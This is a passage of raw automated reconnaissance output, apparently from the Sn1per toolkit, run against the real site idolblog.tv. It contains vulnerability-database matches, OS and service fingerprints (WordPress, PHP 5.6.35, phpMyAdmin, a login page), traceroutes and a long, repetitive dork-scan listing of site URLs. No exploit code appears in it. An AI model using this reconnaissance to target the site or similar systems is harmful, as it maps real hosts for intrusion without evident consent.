2869| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
2870| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
2871| [5814] ISC BIND "
2872| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
2873| [5462] ISC BIND AXFR host command remote buffer overflow
2874|
2875| Exploit-DB - https://www.exploit-db.com:
2876| [24689] cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure
2877| [23059] Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability
2878| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
2879|
2880| OpenVAS (Nessus) - http://www.openvas.org:
2881| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
2882| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
2883| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
2884| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
2885| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
2886| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
2887| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
2888| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
2889| [11226] Oracle 9iAS default error information disclosure
2890|
2891| SecurityTracker - https://www.securitytracker.com:
2892| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
2893| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
2894| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
2895| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
2896| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
2897| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2898| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2899| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2900| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2901| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2902| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2903| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2904| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2905| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
2906| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
2907| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
2908| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
2909| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
2910| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
2911| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
2912| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
2913| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
2914| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
2915| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
2916| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
2917| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
2918|
2919| OSVDB - http://www.osvdb.org:
2920| [86219] Cardiac Science G3 Plus 9390A-501 AED AEDUpdate Cleartext Password Local Disclosure
2921| [22517] MPN HP-180W Wireless IP Phone UDP Port 9090 Information Disclosure
2922| [22516] ZyXEL P-2000W_v2 VoIP Wi-Fi Phone UDP Port 9090 Information Disclosure
2923| [21292] ZyXEL P2000W UDP 9090 Remote Information Disclosure
2924|_
2925Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2926Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
2927No exact OS matches for host (test conditions non-ideal).
2928Network Distance: 10 hops
2929Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
2930
2931Host script results:
2932| dns-blacklist:
2933| SPAM
2934|_ l2.apews.org - SPAM
2935| dns-brute:
2936| DNS Brute-force hostnames:
2937|_ www.idolblog.tv - 89.248.174.131
2938
2939TRACEROUTE (using port 53/tcp)
2940HOP RTT ADDRESS
29411 176.35 ms 10.247.200.1
29422 177.55 ms 213.184.122.97
29433 176.56 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
29444 176.79 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
29455 177.17 ms bzq-179-124-82.cust.bezeqint.net (212.179.124.82)
29466 229.95 ms bzq-219-189-6.cablep.bezeqint.net (62.219.189.6)
29477 235.06 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
29488 231.40 ms bzq-179-72-242.cust.bezeqint.net (212.179.72.242)
29499 239.37 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
295010 239.45 ms 89.248.174.131
2951###############################################################################################################################
2952Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:38 EDT
2953Nmap scan report for idolblog.tv (89.248.174.131)
2954Host is up (0.24s latency).
2955
2956PORT STATE SERVICE VERSION
295780/tcp open ssl/http Apache/2
2958|_http-server-header: Apache/2
2959|_http-trane-info: Problem with XML parsing of /evox/about
2960Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2961Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
2962No exact OS matches for host (test conditions non-ideal).
2963Network Distance: 9 hops
2964
2965TRACEROUTE (using port 80/tcp)
2966HOP RTT ADDRESS
29671 170.97 ms 10.247.200.1
29682 172.30 ms 213.184.122.97
29693 171.24 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
29704 171.37 ms bzq-219-189-185.cablep.bezeqint.net (62.219.189.185)
29715 233.83 ms bzq-219-189-154.dsl.bezeqint.net (62.219.189.154)
29726 234.22 ms linx-224.retn.net (195.66.224.193)
29737 227.08 ms bzq-219-189-57.cablep.bezeqint.net (62.219.189.57)
29748 233.48 ms bzq-179-72-242.cust.bezeqint.net (212.179.72.242)
29759 236.03 ms 89.248.174.131
2976###################################################################################################################################
2977http://idolblog.tv [200 OK] Apache[2], Country[NETHERLANDS][NL], Email[sinblogs@protonmail.com], Google-Analytics[Universal][UA-90400338-8], HTML5, HTTPServer[Apache/2], IP[89.248.174.131], MetaGenerator[WordPress 5.2.2], PHP[5.6.35], PoweredBy[Supercounters], Script[text/javascript,text/javascript>], Title[IdolBlog - Daily pictures of gravure idols from Japan.], UncommonHeaders[upgrade,link], WordPress[5.2.2], X-Powered-By[PHP/5.6.35]
2978###################################################################################################################################################
2979
2980wig - WebApp Information Gatherer
2981
2982
2983Scanning http://idolblog.tv...
2984_____________________ SITE INFO ______________________
2985IP Title
298689.248.174.131 IdolBlog - Daily pictures of gravur
2987
2988______________________ VERSION _______________________
2989Name Versions Type
2990Roundcube CMS
2991phpMyAdmin CMS
2992Apache 2 Platform
2993PHP 5.6.35 Platform
2994
2995____________________ INTERESTING _____________________
2996URL Note Type
2997/readme.html Readme file Interesting
2998/robots.txt robots.txt index Interesting
2999/login/ Login Page Interesting
3000
3001______________________________________________________
3002Time: 101.8 sec Urls: 444 Fingerprints: 40401
3003#######################################################################################################################################
3004HTTP/1.1 200 OK
3005Date: Sat, 20 Jul 2019 07:42:39 GMT
3006Server: Apache/2
3007Upgrade: h2,h2c
3008Connection: Upgrade
3009X-Powered-By: PHP/5.6.35
3010Link: <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
3011Vary: User-Agent
3012Content-Type: text/html; charset=UTF-8
3013
3014HTTP/1.1 200 OK
3015Date: Sat, 20 Jul 2019 07:42:40 GMT
3016Server: Apache/2
3017Upgrade: h2,h2c
3018Connection: Upgrade
3019X-Powered-By: PHP/5.6.35
3020Link: <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
3021Vary: User-Agent
3022Content-Type: text/html; charset=UTF-8
3023#############################################################################################################################################
3024------------------------------------------------------------------------------------------------------------------------
3025
3026[ ! ] Starting SCANNER INURLBR 2.1 at [20-07-2019 03:43:10]
3027[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
3028It is the end user's responsibility to obey all applicable local, state and federal laws.
3029Developers assume no liability and are not responsible for any misuse or damage caused by this program
3030
3031[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/idolblog.tv/output/inurlbr-idolblog.tv ]
3032[ INFO ][ DORK ]::[ site:idolblog.tv ]
3033[ INFO ][ SEARCHING ]:: {
3034[ INFO ][ ENGINE ]::[ GOOGLE - www.google.sm ]
3035
3036[ INFO ][ SEARCHING ]::
3037-[:::]
3038[ INFO ][ ENGINE ]::[ GOOGLE API ]
3039
3040[ INFO ][ SEARCHING ]::
3041-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3042[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.im ID: 003917828085772992913:gmoeray5sa8 ]
3043
3044[ INFO ][ SEARCHING ]::
3045-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3046
3047[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
3048
3049
3050 _[ - ]::--------------------------------------------------------------------------------------------------------------
3051|_[ + ] [ 0 / 100 ]-[03:43:32] [ - ]
3052|_[ + ] Target:: [ http://idolblog.tv/ ]
3053|_[ + ] Exploit::
3054|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3055|_[ + ] More details:: / - / , ISP:
3056|_[ + ] Found:: UNIDENTIFIED
3057
3058 _[ - ]::--------------------------------------------------------------------------------------------------------------
3059|_[ + ] [ 1 / 100 ]-[03:43:35] [ - ]
3060|_[ + ] Target:: [ http://idolblog.tv/teensblog/ ]
3061|_[ + ] Exploit::
3062|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3063|_[ + ] More details:: / - / , ISP:
3064|_[ + ] Found:: UNIDENTIFIED
3065
3066 _[ - ]::--------------------------------------------------------------------------------------------------------------
3067|_[ + ] [ 2 / 100 ]-[03:43:38] [ - ]
3068|_[ + ] Target:: [ http://idolblog.tv/idols/ ]
3069|_[ + ] Exploit::
3070|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3071|_[ + ] More details:: / - / , ISP:
3072|_[ + ] Found:: UNIDENTIFIED
3073
3074 _[ - ]::--------------------------------------------------------------------------------------------------------------
3075|_[ + ] [ 3 / 100 ]-[03:43:41] [ - ]
3076|_[ + ] Target:: [ http://idolblog.tv/latinblog/ ]
3077|_[ + ] Exploit::
3078|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3079|_[ + ] More details:: / - / , ISP:
3080|_[ + ] Found:: UNIDENTIFIED
3081
3082 _[ - ]::--------------------------------------------------------------------------------------------------------------
3083|_[ + ] [ 4 / 100 ]-[03:43:44] [ - ]
3084|_[ + ] Target:: [ http://idolblog.tv/wetblog/ ]
3085|_[ + ] Exploit::
3086|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3087|_[ + ] More details:: / - / , ISP:
3088|_[ + ] Found:: UNIDENTIFIED
3089
3090 _[ - ]::--------------------------------------------------------------------------------------------------------------
3091|_[ + ] [ 5 / 100 ]-[03:43:46] [ - ]
3092|_[ + ] Target:: [ http://idolblog.tv/__trashed/ ]
3093|_[ + ] Exploit::
3094|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3095|_[ + ] More details:: / - / , ISP:
3096|_[ + ] Found:: UNIDENTIFIED
3097
3098 _[ - ]::--------------------------------------------------------------------------------------------------------------
3099|_[ + ] [ 6 / 100 ]-[03:43:49] [ - ]
3100|_[ + ] Target:: [ http://idolblog.tv/about/ ]
3101|_[ + ] Exploit::
3102|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3103|_[ + ] More details:: / - / , ISP:
3104|_[ + ] Found:: UNIDENTIFIED
3105
3106 _[ - ]::--------------------------------------------------------------------------------------------------------------
3107|_[ + ] [ 7 / 100 ]-[03:43:51] [ - ]
3108|_[ + ] Target:: [ http://idolblog.tv/modelblog/ ]
3109|_[ + ] Exploit::
3110|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3111|_[ + ] More details:: / - / , ISP:
3112|_[ + ] Found:: UNIDENTIFIED
3113
3114 _[ - ]::--------------------------------------------------------------------------------------------------------------
3115|_[ + ] [ 8 / 100 ]-[03:43:54] [ - ]
3116|_[ + ] Target:: [ http://idolblog.tv/sexyblog/ ]
3117|_[ + ] Exploit::
3118|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3119|_[ + ] More details:: / - / , ISP:
3120|_[ + ] Found:: UNIDENTIFIED
3121
3122 _[ - ]::--------------------------------------------------------------------------------------------------------------
3123|_[ + ] [ 9 / 100 ]-[03:43:58] [ - ]
3124|_[ + ] Target:: [ http://idolblog.tv/websites/ ]
3125|_[ + ] Exploit::
3126|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3127|_[ + ] More details:: / - / , ISP:
3128|_[ + ] Found:: UNIDENTIFIED
3129
3130 _[ - ]::--------------------------------------------------------------------------------------------------------------
3131|_[ + ] [ 10 / 100 ]-[03:44:00] [ - ]
3132|_[ + ] Target:: [ http://idolblog.tv/page/91/ ]
3133|_[ + ] Exploit::
3134|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3135|_[ + ] More details:: / - / , ISP:
3136|_[ + ] Found:: UNIDENTIFIED
3137
3138 _[ - ]::--------------------------------------------------------------------------------------------------------------
3139|_[ + ] [ 11 / 100 ]-[03:44:03] [ - ]
3140|_[ + ] Target:: [ http://idolblog.tv/page/67/ ]
3141|_[ + ] Exploit::
3142|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3143|_[ + ] More details:: / - / , ISP:
3144|_[ + ] Found:: UNIDENTIFIED
3145
3146 _[ - ]::--------------------------------------------------------------------------------------------------------------
3147|_[ + ] [ 12 / 100 ]-[03:44:06] [ - ]
3148|_[ + ] Target:: [ http://idolblog.tv/page/29/ ]
3149|_[ + ] Exploit::
3150|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3151|_[ + ] More details:: / - / , ISP:
3152|_[ + ] Found:: UNIDENTIFIED
3153
3154 _[ - ]::--------------------------------------------------------------------------------------------------------------
3155|_[ + ] [ 13 / 100 ]-[03:44:09] [ - ]
3156|_[ + ] Target:: [ http://idolblog.tv/page/106/ ]
3157|_[ + ] Exploit::
3158|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3159|_[ + ] More details:: / - / , ISP:
3160|_[ + ] Found:: UNIDENTIFIED
3161
3162 _[ - ]::--------------------------------------------------------------------------------------------------------------
3163|_[ + ] [ 14 / 100 ]-[03:44:11] [ - ]
3164|_[ + ] Target:: [ http://idolblog.tv/page/55/ ]
3165|_[ + ] Exploit::
3166|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3167|_[ + ] More details:: / - / , ISP:
3168|_[ + ] Found:: UNIDENTIFIED
3169
3170 _[ - ]::--------------------------------------------------------------------------------------------------------------
3171|_[ + ] [ 15 / 100 ]-[03:44:14] [ - ]
3172|_[ + ] Target:: [ http://idolblog.tv/page/43/ ]
3173|_[ + ] Exploit::
3174|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3175|_[ + ] More details:: / - / , ISP:
3176|_[ + ] Found:: UNIDENTIFIED
3177
3178 _[ - ]::--------------------------------------------------------------------------------------------------------------
3179|_[ + ] [ 16 / 100 ]-[03:44:17] [ - ]
3180|_[ + ] Target:: [ http://idolblog.tv/page/138/ ]
3181|_[ + ] Exploit::
3182|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3183|_[ + ] More details:: / - / , ISP:
3184|_[ + ] Found:: UNIDENTIFIED
3185
3186 _[ - ]::--------------------------------------------------------------------------------------------------------------
3187|_[ + ] [ 17 / 100 ]-[03:44:20] [ - ]
3188|_[ + ] Target:: [ http://idolblog.tv/page/149/ ]
3189|_[ + ] Exploit::
3190|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3191|_[ + ] More details:: / - / , ISP:
3192|_[ + ] Found:: UNIDENTIFIED
3193
3194 _[ - ]::--------------------------------------------------------------------------------------------------------------
3195|_[ + ] [ 18 / 100 ]-[03:44:22] [ - ]
3196|_[ + ] Target:: [ http://idolblog.tv/page/94/ ]
3197|_[ + ] Exploit::
3198|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3199|_[ + ] More details:: / - / , ISP:
3200|_[ + ] Found:: UNIDENTIFIED
3201
3202 _[ - ]::--------------------------------------------------------------------------------------------------------------
3203|_[ + ] [ 19 / 100 ]-[03:44:25] [ - ]
3204|_[ + ] Target:: [ http://idolblog.tv/page/83/ ]
3205|_[ + ] Exploit::
3206|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3207|_[ + ] More details:: / - / , ISP:
3208|_[ + ] Found:: UNIDENTIFIED
3209
3210 _[ - ]::--------------------------------------------------------------------------------------------------------------
3211|_[ + ] [ 20 / 100 ]-[03:44:28] [ - ]
3212|_[ + ] Target:: [ http://idolblog.tv/page/97/ ]
3213|_[ + ] Exploit::
3214|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3215|_[ + ] More details:: / - / , ISP:
3216|_[ + ] Found:: UNIDENTIFIED
3217
3218 _[ - ]::--------------------------------------------------------------------------------------------------------------
3219|_[ + ] [ 21 / 100 ]-[03:44:30] [ - ]
3220|_[ + ] Target:: [ http://idolblog.tv/page/92/ ]
3221|_[ + ] Exploit::
3222|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3223|_[ + ] More details:: / - / , ISP:
3224|_[ + ] Found:: UNIDENTIFIED
3225
3226 _[ - ]::--------------------------------------------------------------------------------------------------------------
3227|_[ + ] [ 22 / 100 ]-[03:44:33] [ - ]
3228|_[ + ] Target:: [ http://idolblog.tv/page/95/ ]
3229|_[ + ] Exploit::
3230|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3231|_[ + ] More details:: / - / , ISP:
3232|_[ + ] Found:: UNIDENTIFIED
3233
3234 _[ - ]::--------------------------------------------------------------------------------------------------------------
3235|_[ + ] [ 23 / 100 ]-[03:44:36] [ - ]
3236|_[ + ] Target:: [ http://idolblog.tv/page/61/ ]
3237|_[ + ] Exploit::
3238|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3239|_[ + ] More details:: / - / , ISP:
3240|_[ + ] Found:: UNIDENTIFIED
3241
3242 _[ - ]::--------------------------------------------------------------------------------------------------------------
3243|_[ + ] [ 24 / 100 ]-[03:44:39] [ - ]
3244|_[ + ] Target:: [ http://idolblog.tv/page/130/ ]
3245|_[ + ] Exploit::
3246|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3247|_[ + ] More details:: / - / , ISP:
3248|_[ + ] Found:: UNIDENTIFIED
3249
3250 _[ - ]::--------------------------------------------------------------------------------------------------------------
3251|_[ + ] [ 25 / 100 ]-[03:44:42] [ - ]
3252|_[ + ] Target:: [ http://idolblog.tv/tag/mey/ ]
3253|_[ + ] Exploit::
3254|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3255|_[ + ] More details:: / - / , ISP:
3256|_[ + ] Found:: UNIDENTIFIED
3257
3258 _[ - ]::--------------------------------------------------------------------------------------------------------------
3259|_[ + ] [ 26 / 100 ]-[03:44:45] [ - ]
3260|_[ + ] Target:: [ http://idolblog.tv/page/120/ ]
3261|_[ + ] Exploit::
3262|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3263|_[ + ] More details:: / - / , ISP:
3264|_[ + ] Found:: UNIDENTIFIED
3265
3266 _[ - ]::--------------------------------------------------------------------------------------------------------------
3267|_[ + ] [ 27 / 100 ]-[03:44:48] [ - ]
3268|_[ + ] Target:: [ http://idolblog.tv/page/14/ ]
3269|_[ + ] Exploit::
3270|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3271|_[ + ] More details:: / - / , ISP:
3272|_[ + ] Found:: UNIDENTIFIED
3273
3274 _[ - ]::--------------------------------------------------------------------------------------------------------------
3275|_[ + ] [ 28 / 100 ]-[03:44:51] [ - ]
3276|_[ + ] Target:: [ http://idolblog.tv/page/24/ ]
3277|_[ + ] Exploit::
3278|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3279|_[ + ] More details:: / - / , ISP:
3280|_[ + ] Found:: UNIDENTIFIED
3281
3282 _[ - ]::--------------------------------------------------------------------------------------------------------------
3283|_[ + ] [ 29 / 100 ]-[03:44:54] [ - ]
3284|_[ + ] Target:: [ http://idolblog.tv/page/36/ ]
3285|_[ + ] Exploit::
3286|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3287|_[ + ] More details:: / - / , ISP:
3288|_[ + ] Found:: UNIDENTIFIED
3289
3290 _[ - ]::--------------------------------------------------------------------------------------------------------------
3291|_[ + ] [ 30 / 100 ]-[03:44:57] [ - ]
3292|_[ + ] Target:: [ http://idolblog.tv/page/88/ ]
3293|_[ + ] Exploit::
3294|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3295|_[ + ] More details:: / - / , ISP:
3296|_[ + ] Found:: UNIDENTIFIED
3297
3298 _[ - ]::--------------------------------------------------------------------------------------------------------------
3299|_[ + ] [ 31 / 100 ]-[03:44:59] [ - ]
3300|_[ + ] Target:: [ http://idolblog.tv/page/116/ ]
3301|_[ + ] Exploit::
3302|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3303|_[ + ] More details:: / - / , ISP:
3304|_[ + ] Found:: UNIDENTIFIED
3305
3306 _[ - ]::--------------------------------------------------------------------------------------------------------------
3307|_[ + ] [ 32 / 100 ]-[03:45:03] [ - ]
3308|_[ + ] Target:: [ http://idolblog.tv/page/39/ ]
3309|_[ + ] Exploit::
3310|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3311|_[ + ] More details:: / - / , ISP:
3312|_[ + ] Found:: UNIDENTIFIED
3313
3314 _[ - ]::--------------------------------------------------------------------------------------------------------------
3315|_[ + ] [ 33 / 100 ]-[03:45:06] [ - ]
3316|_[ + ] Target:: [ http://idolblog.tv/page/135/ ]
3317|_[ + ] Exploit::
3318|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3319|_[ + ] More details:: / - / , ISP:
3320|_[ + ] Found:: UNIDENTIFIED
3321
3322 _[ - ]::--------------------------------------------------------------------------------------------------------------
3323|_[ + ] [ 34 / 100 ]-[03:45:09] [ - ]
3324|_[ + ] Target:: [ http://idolblog.tv/tag/ami/ ]
3325|_[ + ] Exploit::
3326|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3327|_[ + ] More details:: / - / , ISP:
3328|_[ + ] Found:: UNIDENTIFIED
3329
3330 _[ - ]::--------------------------------------------------------------------------------------------------------------
3331|_[ + ] [ 35 / 100 ]-[03:45:12] [ - ]
3332|_[ + ] Target:: [ http://idolblog.tv/page/86/ ]
3333|_[ + ] Exploit::
3334|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3335|_[ + ] More details:: / - / , ISP:
3336|_[ + ] Found:: UNIDENTIFIED
3337
3338 _[ - ]::--------------------------------------------------------------------------------------------------------------
3339|_[ + ] [ 36 / 100 ]-[03:45:15] [ - ]
3340|_[ + ] Target:: [ http://idolblog.tv/page/47/ ]
3341|_[ + ] Exploit::
3342|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3343|_[ + ] More details:: / - / , ISP:
3344|_[ + ] Found:: UNIDENTIFIED
3345
3346 _[ - ]::--------------------------------------------------------------------------------------------------------------
3347|_[ + ] [ 37 / 100 ]-[03:45:18] [ - ]
3348|_[ + ] Target:: [ http://idolblog.tv/tag/ai/ ]
3349|_[ + ] Exploit::
3350|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3351|_[ + ] More details:: / - / , ISP:
3352|_[ + ] Found:: UNIDENTIFIED
3353
3354 _[ - ]::--------------------------------------------------------------------------------------------------------------
3355|_[ + ] [ 38 / 100 ]-[03:45:21] [ - ]
3356|_[ + ] Target:: [ http://idolblog.tv/page/111/ ]
3357|_[ + ] Exploit::
3358|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3359|_[ + ] More details:: / - / , ISP:
3360|_[ + ] Found:: UNIDENTIFIED
3361
3362 _[ - ]::--------------------------------------------------------------------------------------------------------------
3363|_[ + ] [ 39 / 100 ]-[03:45:25] [ - ]
3364|_[ + ] Target:: [ http://idolblog.tv/page/139/ ]
3365|_[ + ] Exploit::
3366|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3367|_[ + ] More details:: / - / , ISP:
3368|_[ + ] Found:: UNIDENTIFIED
3369
3370 _[ - ]::--------------------------------------------------------------------------------------------------------------
3371|_[ + ] [ 40 / 100 ]-[03:45:28] [ - ]
3372|_[ + ] Target:: [ http://idolblog.tv/page/131/ ]
3373|_[ + ] Exploit::
3374|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3375|_[ + ] More details:: / - / , ISP:
3376|_[ + ] Found:: UNIDENTIFIED
3377
3378 _[ - ]::--------------------------------------------------------------------------------------------------------------
3379|_[ + ] [ 41 / 100 ]-[03:45:30] [ - ]
3380|_[ + ] Target:: [ http://idolblog.tv/page/90/ ]
3381|_[ + ] Exploit::
3382|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
3383|_[ + ] More details:: / - / , ISP:
3384|_[ + ] Found:: UNIDENTIFIED
3385
